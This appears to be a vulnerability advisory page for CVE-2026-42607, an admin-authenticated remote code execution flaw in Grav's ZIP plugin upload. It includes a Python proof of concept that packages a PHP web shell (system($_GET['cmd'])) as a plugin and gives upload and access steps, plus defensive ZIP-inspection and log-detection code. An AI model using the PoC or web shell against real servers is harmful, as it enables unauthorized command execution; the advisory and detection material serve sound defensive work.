Security Vulnerability Report
CVE-2026-42607 CVSS 9.1 CRITICAL

Published: 2026-05-11 16:17:33
Last Modified: 2026-05-11 16:17:33

Description

Grav is a file-based Web platform. Prior to 2.0.0-beta.2, an authenticated user with administrative privileges can achieve Remote Code Execution (RCE) by uploading a specially crafted ZIP file through the "Direct Install" tool. While the system attempts to block direct .php file uploads, it fails to inspect the contents of uploaded ZIP archives. Once a malicious plugin is extracted, it can execute arbitrary PHP code or drop a persistent web shell on the server. This vulnerability is fixed in 2.0.0-beta.2.
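The description pins the defect to a filename-only upload filter: the ".php" check runs on the uploaded file's name, not on the members of the archive that Direct Install later extracts. The Python below is an added example of the inspection step that was missing, written against the page's own PoC layout; it is not Grav's code and not the change in the referenced fix commit. It walks the ZIP's central directory in memory without extracting anything and reports PHP members, the top-level layout, and Zip Slip paths (an extra check the advisory does not mention). Because a real Grav plugin legitimately ships PHP (user/plugins/<name>/<name>.php next to a blueprints.yaml), PHP members are surfaced for review rather than rejected; only path traversal is a hard failure. The suffix list, the layout expectations and the sample archives are assumptions constructed for this example.

```python
import io
import posixpath
import zipfile

# Suffixes that PHP-capable servers commonly execute. Assumption: an illustrative
# list for this example, not Grav's own upload filter.
PHP_SUFFIXES = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps"}


def is_php_name(member: str) -> bool:
    """True if any dotted suffix is PHP-executable, so x.php, x.PHTML and x.php.txt all match."""
    base = posixpath.basename(member.replace("\\", "/")).lower()
    return any(part in PHP_SUFFIXES for part in base.split(".")[1:])


def escapes_root(member: str) -> bool:
    """Zip Slip check: absolute paths, drive letters or '..' segments escape the extraction dir."""
    name = member.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return True
    return any(segment == ".." for segment in name.split("/"))


def inspect_plugin_zip(data: bytes) -> dict:
    """Walk the archive's central directory (no extraction) and report what a
    filename-only upload filter never sees. PHP members are listed, not rejected,
    because a legitimate plugin contains PHP; traversal is the only hard failure."""
    report = {"unsafe_paths": [], "php_members": [], "top_level": set(), "has_blueprint": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if escapes_root(name):
                report["unsafe_paths"].append(name)
                continue
            parts = name.replace("\\", "/").strip("/").split("/")
            report["top_level"].add(parts[0])
            if info.is_dir():
                continue
            # Grav plugins carry a blueprints.yaml directly under the plugin directory.
            if len(parts) == 2 and parts[1] == "blueprints.yaml":
                report["has_blueprint"] = True
            if is_php_name(name):
                report["php_members"].append(name)
    report["top_level"] = sorted(report["top_level"])
    return report


def review_notes(report: dict) -> list:
    """Turn the report into findings for whoever approves the install."""
    notes = []
    if report["unsafe_paths"]:
        notes.append("REJECT: path traversal in " + ", ".join(report["unsafe_paths"]))
    if len(report["top_level"]) != 1:
        notes.append("layout: expected one top-level plugin directory, found %d" % len(report["top_level"]))
    if not report["has_blueprint"]:
        notes.append("layout: no blueprints.yaml at the top level")
    for member in report["php_members"]:
        notes.append("php: " + member)
    return notes


def build_zip(members: dict) -> bytes:
    """Build a constructed sample archive in memory (nothing is written to disk)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: the archive the PoC on this page produces, a minimal
# legitimate plugin layout, and a Zip Slip archive.
WEBSHELL_ZIP = build_zip({"malicious_plugin/vuln.php": "<?php system($_GET['cmd']); ?>"})
PLUGIN_ZIP = build_zip({
    "demo/blueprints.yaml": "name: Demo\nversion: 1.0.0\n",
    "demo/demo.yaml": "enabled: true\n",
    "demo/demo.php": "<?php\nnamespace Grav\\Plugin;\nclass DemoPlugin {}\n",
})
SLIP_ZIP = build_zip({"../../index.php": "<?php echo 1;"})

if __name__ == "__main__":
    for label, blob in (("webshell", WEBSHELL_ZIP), ("plugin", PLUGIN_ZIP), ("zip-slip", SLIP_ZIP)):
        print(label, review_notes(inspect_plugin_zip(blob)))
```

The point the report makes visible is that the PoC archive is distinguishable from a plugin not by "contains PHP" (both do) but by what it lacks: no blueprints.yaml and no <name>.php matching the directory. Any policy stricter than "show it to the admin" has to come from the project's own package format, which is why the example stops at findings rather than an allow/deny decision for PHP.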

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

PR:H records that a valid administrator account is required, which is why the exploitability sub-score is only 2.3. The CRITICAL rating comes from S:C together with High confidentiality, integrity and availability impact (impact sub-score 6.0): PHP dropped by the installed plugin runs with the web server's privileges on the host, well outside the admin panel that is the vulnerable component.

Configurations (Affected Products)

No CPE configuration data has been published for this record yet (vulnStatus: Received). The affected range stated in the description is:

Grav < 2.0.0-beta.2 (fixed in 2.0.0-beta.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import zipfile
import os

# 1. Create malicious PHP code (webshell)
php_content = "<?php system($_GET['cmd']); ?>"

# 2. Create a directory structure mimicking a Grav plugin
plugin_name = "malicious_plugin"
os.makedirs(plugin_name, exist_ok=True)

# Write the malicious file inside the plugin folder
shell_path = os.path.join(plugin_name, "vuln.php")
with open(shell_path, "w") as f:
    f.write(php_content)

# 3. Zip the directory; the .php member is inside the archive, so the
#    upload-time filename check never sees it
zip_filename = "exploit.zip"
with zipfile.ZipFile(zip_filename, "w") as zipf:
    zipf.write(shell_path, arcname=os.path.join(plugin_name, "vuln.php"))

print(f"[+] Created malicious ZIP file: {zip_filename}")
print("[+] Upload this file to the 'Direct Install' section in the Grav Admin panel.")
print(f"[+] Access the shell at: /user/plugins/{plugin_name}/vuln.php?cmd=whoami")

# Cleanup local artifacts (the ZIP itself is kept)
os.remove(shell_path)
os.rmdir(plugin_name)
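The PoC's last line names the post-exploitation artifact: a PHP file under /user/plugins/ answered directly, with the command in a query parameter. As an added detection example (not from the advisory or the Grav project), the following Python scans combined-format access log lines for direct hits on PHP under the plugin and theme trees and grades them by whether the request was served and whether it carried a shell-style parameter. The log lines are constructed for this example; the parameter names, the directory list, and the premise that a Grav site does not legitimately serve PHP from user/plugins/ directly are assumptions. Whether such a request reaches PHP at all depends on the front-end server's rewrite rules, so a 403 here is still logged as a probe.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format; regex constructed for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Trees under which a Grav site should not be serving PHP directly: requests are
# meant to be routed through index.php. Assumption for this example.
CODE_DIRS = ("/user/plugins/", "/user/themes/")
# Parameter names commonly used by one-line web shells (illustrative, not exhaustive).
SHELL_PARAMS = {"cmd", "c", "command", "exec", "e", "x"}


def classify(line: str):
    """Return a finding dict for a direct PHP hit under CODE_DIRS, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    if not path.startswith(CODE_DIRS) or not path.endswith((".php", ".phtml", ".phar")):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    cmd_params = sorted(SHELL_PARAMS & set(params))
    status = int(m.group("status"))
    # A served (2xx) PHP file with a command parameter is the strongest signal;
    # a served file without one still means PHP is reachable; a blocked hit is a probe.
    if status // 100 == 2 and cmd_params:
        severity = "high"
    elif status // 100 == 2:
        severity = "medium"
    else:
        severity = "low"
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "status": status, "cmd_params": cmd_params, "severity": severity}


def scan(lines):
    """Run classify() over an iterable of log lines and keep the findings."""
    return [f for f in (classify(line) for line in lines) if f]


# Constructed sample log: two normal requests, the PoC shell being used twice,
# and a later direct probe that the server refused.
SAMPLE_LOG = """\
203.0.113.7 - - [11/May/2026:16:20:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [11/May/2026:16:20:05 +0000] "GET /user/plugins/form/assets/form.min.js HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
198.51.100.9 - - [11/May/2026:16:21:40 +0000] "GET /admin HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
198.51.100.9 - - [11/May/2026:16:22:03 +0000] "GET /user/plugins/malicious_plugin/vuln.php?cmd=whoami HTTP/1.1" 200 12 "-" "curl/8.4.0"
198.51.100.9 - - [11/May/2026:16:22:09 +0000] "GET /user/plugins/malicious_plugin/vuln.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.4.0"
192.0.2.33 - - [11/May/2026:16:30:11 +0000] "GET /user/plugins/admin/admin.php HTTP/1.1" 403 199 "-" "python-requests/2.31"
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding["severity"], finding["ip"], finding["path"], finding["status"], finding["cmd_params"])
```

Correlating a high finding with the admin session that performed the Direct Install shortly before it (same source IP in the sample) is what turns this from "a PHP file was hit" into "which account installed it", so keep the admin panel's own logs alongside the web server's.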

References

https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw (GitHub Security Advisory)
https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663 (fix commit)

Weakness: CWE-94 (Improper Control of Generation of Code, "Code Injection")

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-42607",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T16:17:32.720",
    "lastModified": "2026-05-11T16:17:32.720",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Grav is a file-based Web platform. Prior to 2.0.0-beta.2, an authenticated user with administrative privileges can achieve Remote Code Execution (RCE) by uploading a specially crafted ZIP file through the \"Direct Install\" tool. While the system attempts to block direct .php file uploads, it fails to inspect the contents of uploaded ZIP archives. Once a malicious plugin is extracted, it can execute arbitrary PHP code or drop a persistent web shell on the server. This vulnerability is fixed in 2.0.0-beta.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw",
        "source": "[email protected]"
      }
    ]
  }
}